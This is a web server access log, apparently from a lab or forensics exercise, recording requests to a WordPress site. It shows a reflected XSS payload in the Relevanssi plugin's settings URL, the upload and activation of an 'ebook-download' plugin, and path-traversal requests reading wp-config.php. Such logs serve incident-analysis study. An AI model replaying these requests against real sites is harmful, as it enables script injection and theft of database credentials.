2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-content/plugins/relevanssi/lib/admin_scripts_free.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 26
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-content/plugins/relevanssi/lib/admin_scripts.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 29
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-admin/load-styles.php c=1&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-color-picker&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 132
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-draggable,jquery-ui-slider,jquery-tou&load%5B%5D=ch-punch,iris,wp-color-picker&ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 146
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/wp-ajax-response.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 3
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/jquery/jquery.color.min.js ver=2.1.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 39
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/wp-lists.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 10
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/quicktags.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 19
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/jquery/jquery.query.js ver=2.1.7 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 14
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-admin/js/postbox.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 16
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/underscore.min.js ver=1.8.3 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 19
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/jquery/ui/sortable.min.js ver=1.11.4 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 19
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/wp-util.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 59
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-admin/js/edit-comments.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 67
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-includes/js/wp-a11y.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 61
2020-07-08 13:37:22 192.168.198.142 GET /forensics/wp-admin/js/dashboard.min.js ver=5.2.1 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String(%2FXSS%2F)%3Bx+%3D+x.substring(1%2C+x.length-1)%3Balert(x)%3C%2FSCRIPT%3E%3CBR+ 200 0 0 41
2020-07-08 13:37:26 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1596
2020-07-08 13:37:26 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1626
2020-07-08 13:38:26 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1495
2020-07-08 13:38:32 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1549
2020-07-08 13:39:29 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 4225
2020-07-08 13:39:29 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 4228
2020-07-08 13:40:36 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 5062
2020-07-08 13:41:28 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 2025
2020-07-08 13:41:28 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 2055
2020-07-08 13:41:33 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 2054
2020-07-08 13:42:32 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1489
2020-07-08 13:43:29 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 2242
2020-07-08 13:43:29 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 2280
2020-07-08 13:44:32 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1578
2020-07-08 13:45:30 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1490
2020-07-08 13:45:30 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1560
2020-07-08 13:46:32 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1485
2020-07-08 13:47:31 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1570
2020-07-08 13:47:31 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/ 200 0 0 1570
2020-07-08 13:48:32 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1557
2020-07-08 13:49:32 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1634
2020-07-08 13:50:32 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1482
2020-07-08 13:51:33 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1466
2020-07-08 13:51:40 192.168.198.142 POST /forensics/wp-admin/admin-ajax.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1519
2020-07-08 13:51:43 192.168.198.142 GET /forensics/wp-admin/plugins.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=%27%3E%3CSCRIPT%3Evar+x+%3D+String%28%2FXSS%2F%29%3Bx+%3D+x.substring%281%2C+x.length-1%29%3Balert%28x%29%3C%2FSCRIPT%3E%3CBR+ 200 0 0 1847
2020-07-08 13:51:48 192.168.198.142 GET /forensics/wp-admin/plugin-install.php - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/plugins.php 200 0 0 3245
2020-07-08 13:52:29 192.168.198.142 POST /forensics/wp-admin/update.php action=upload-plugin 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/plugin-install.php 200 0 0 9359
2020-07-08 13:52:36 192.168.198.142 GET /forensics/wp-admin/plugins.php action=activate&plugin=ebook-download%2Febookdownload.php&_wpnonce=45f3c9d4cb 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/update.php?action=upload-plugin 302 0 0 5537
2020-07-08 13:52:38 192.168.198.142 GET /forensics/wp-admin/plugins.php activate=true&plugin_status=all&paged=1&s= 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/wp-admin/update.php?action=upload-plugin 200 0 0 1594
2020-07-08 13:52:51 192.168.198.142 GET /forensics/wp-content/plugins/ebook-download/filedownload.php ebookdownloadurl=../../../wp-config.php 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 200 0 0 53
2020-07-08 13:53:28 192.168.198.142 GET /forensics/wp-content/plugins/ebook-download/filedownload.php ebookdownloadurl=../../../wp-config.php 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 200 0 0 45